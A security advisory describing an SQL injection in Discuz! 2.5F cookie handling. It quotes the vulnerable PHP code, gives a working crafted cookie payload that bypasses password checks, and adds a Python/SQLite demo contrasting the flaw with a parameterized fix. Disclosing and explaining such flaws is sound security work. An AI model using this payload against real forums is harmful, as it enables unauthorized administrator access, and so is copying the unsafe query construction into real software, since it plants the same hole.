Discuz! 2.5F unfiltered cookie vulnerability (SQL injection)


Date: 2006-10-26
Reported by: 火狐技术联盟 - 我非我 [www.wrsky.com]

Summary:
In the new Discuz! 2.5F forum release, the values of the `_discuz_uid`, `_discuz_pw` and `_discuz_secques` cookies are read without any filtering and interpolated directly into a SQL query (SQL injection). By crafting the cookie locally, an attacker can obtain administrator privileges.

Details:
File include/common.php, starting at line 87:

=================================code begin==========================================================
$discuz_uid = $_COOKIE['_discuz_uid'];        // none of these three cookie values is filtered or validated
$discuz_pw = $_COOKIE['_discuz_pw'];
$discuz_secques = $_COOKIE['_discuz_secques'];

$newpm = $newpmexists = $sessionexists = $adminid = $adminglobal = 0;

$userinfo = "m.uid AS discuz_uid, m.username AS discuz_user, m.password AS discuz_pw, m.adminid, m.groupid, m.email, m.timeoffset, m.tpp, m.ppp, m.credit, m.timeformat, m.dateformat, m.signature, m.invisible, m.lastvisit, m.lastpost, m.newpm, m.accessmasks, m.regdate";
// the raw cookie values are interpolated straight into the query string and handed to MySQL
if($sid) {
    if($discuz_uid) {
        $query = $db->query("SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, $userinfo FROM $table_sessions s, $table_members m WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid' AND m.password='$discuz_pw' AND m.secques='$discuz_secques'");
    } else {
        $query = $db->query("SELECT sid, uid AS sessionuid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
    }
    if($_DSESSION = $db->fetch_array($query)) {
        $sessionexists = 1;
        if(!empty($_DSESSION['sessionuid'])) {
            $query = $db->query("SELECT $userinfo FROM $table_members m WHERE uid='$_DSESSION[sessionuid]'");
            $_DSESSION = array_merge($_DSESSION, $db->fetch_array($query));
        }
    } else {
        $query = $db->query("SELECT sid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
        if($_DSESSION = $db->fetch_array($query)) {
            clearcookies();
            $sessionexists = 1;
        }
    }
}
if(!$sessionexists) {

..........................................

====================================code end==========================================================



Locally crafted cookie (set in the browser for the target forum):

sid=dAgM7P; _cookietime=2592000; expand_menu=0__3; _discuz_uid=1' or '1'='1' /*; _discuz_pw=wofeiwo; _discuz_secques=hehe

The `_discuz_uid` value closes the quoted string in `m.uid='$discuz_uid'`, appends `or '1'='1'`, and the trailing `/*` comments out the remainder of the WHERE clause, so `m.password` and `m.secques` are never compared and the `_discuz_pw` / `_discuz_secques` values can be anything. The `sid` cookie only needs to be non-empty, since the outer `if($sid)` requires it; the `s.sid` comparison itself is swallowed by the injected `OR`. One caveat: because `OR` binds less tightly than `AND`, the injected condition makes the whole WHERE clause true, so the query returns the first row of the sessions × members join; which member that is depends on the tables, so it is not guaranteed to be the administrator.
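To make the injection concrete, the following is an added example (Python with an in-memory SQLite table standing in for Discuz!'s sessions and members tables; not code from Discuz! or from this advisory). It builds the same WHERE clause that include/common.php builds, using the advisory's exact cookie values, shows the password and security-question checks being commented out, and places a hardened lookup (uid cast to an integer, every value bound as a query parameter) beside the vulnerable one. The table layout, the admin's stored password hash, the session's IP and the `LEGIT_COOKIE` dictionary are constructed for the demo. SQLite treats an unterminated `/*` as a comment running to the end of the input, so the payload behaves as described above.

```python
import sqlite3

# Cookie values copied verbatim from the crafted cookie in the advisory.
EVIL_COOKIE = {
    "sid": "dAgM7P",
    "_discuz_uid": "1' or '1'='1' /*",
    "_discuz_pw": "wofeiwo",
    "_discuz_secques": "hehe",
}

# Constructed for the demo (not from the page): the hash stored for the admin,
# the cookie a genuinely logged-in admin would send, and the IP the session is bound to.
ADMIN_PW_HASH = "0123456789abcdef0123456789abcdef"
LEGIT_COOKIE = {
    "sid": "dAgM7P",
    "_discuz_uid": "1",
    "_discuz_pw": ADMIN_PW_HASH,
    "_discuz_secques": "",
}
ONLINE_IP = "192.0.2.10"


def make_db():
    """Constructed stand-in for the sessions/members tables: one admin (uid 1) and one
    session row bound to uid 1 and ONLINE_IP. Column names follow the PHP query."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE members  (uid INTEGER, username TEXT, password TEXT, secques TEXT, adminid INTEGER);
        CREATE TABLE sessions (sid TEXT, uid INTEGER, ip TEXT);
    """)
    db.execute("INSERT INTO members VALUES (?, ?, ?, ?, ?)", (1, "admin", ADMIN_PW_HASH, "", 1))
    db.execute("INSERT INTO sessions VALUES (?, ?, ?)", ("dAgM7P", 1, ONLINE_IP))
    return db


def vulnerable_sql(cookie, onlineip):
    """Same construction as include/common.php: cookie text pasted into the SQL unescaped.
    (CONCAT_WS over ip1..ip4 is collapsed to a single ip column for the SQLite stand-in.)"""
    return (
        "SELECT s.sid, m.uid, m.username, m.adminid FROM sessions s, members m "
        "WHERE m.uid=s.uid AND s.sid='%s' AND s.ip='%s' AND m.uid='%s' "
        "AND m.password='%s' AND m.secques='%s'"
    ) % (cookie["sid"], onlineip, cookie["_discuz_uid"],
         cookie["_discuz_pw"], cookie["_discuz_secques"])


def vulnerable_lookup(db, cookie, onlineip):
    """The advisory's flaw: with the crafted uid the clause ends in
    ... AND m.uid='1' or '1'='1' /*' AND m.password='wofeiwo' AND m.secques='hehe'
    so the password and secques comparisons are commented out and a member row is returned."""
    return db.execute(vulnerable_sql(cookie, onlineip)).fetchone()


def safe_lookup(db, cookie, onlineip):
    """Hardened form: the uid is cast to an integer (what intval() does in PHP) and every
    value is bound as a parameter, so cookie text is never parsed as SQL. Either measure
    alone defeats this payload; parameters also cover the two string cookies."""
    try:
        uid = int(cookie["_discuz_uid"])
    except ValueError:
        return None  # "1' or '1'='1' /*" is not a uid: reject before touching the database
    sql = (
        "SELECT s.sid, m.uid, m.username, m.adminid FROM sessions s, members m "
        "WHERE m.uid=s.uid AND s.sid=? AND s.ip=? AND m.uid=? "
        "AND m.password=? AND m.secques=?"
    )
    params = (cookie["sid"], onlineip, uid, cookie["_discuz_pw"], cookie["_discuz_secques"])
    return db.execute(sql, params).fetchone()


def demo():
    """Run the cases side by side; each value is the fetched row or None."""
    db = make_db()
    wrong_pw_cookie = dict(LEGIT_COOKIE, _discuz_pw="wofeiwo")
    return {
        "vulnerable_with_evil_cookie": vulnerable_lookup(db, EVIL_COOKIE, ONLINE_IP),
        "vulnerable_with_legit_cookie": vulnerable_lookup(db, LEGIT_COOKIE, ONLINE_IP),
        "safe_with_evil_cookie": safe_lookup(db, EVIL_COOKIE, ONLINE_IP),
        "safe_with_wrong_password": safe_lookup(db, wrong_pw_cookie, ONLINE_IP),
        "safe_with_legit_cookie": safe_lookup(db, LEGIT_COOKIE, ONLINE_IP),
    }


if __name__ == "__main__":
    print(vulnerable_sql(EVIL_COOKIE, ONLINE_IP))
    for name, row in demo().items():
        print(f"{name}: {row}")
```

Running it prints the injected query text and then the five results: the vulnerable lookup hands back the admin row for the crafted cookie even though `wofeiwo`/`hehe` match nothing, while the hardened lookup returns a row only for the cookie that carries the correct uid, password hash and security answer.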





Demo video download:

http://down.juntuan.net/data/soft/778.html

(Source: http://www.sheup.com)

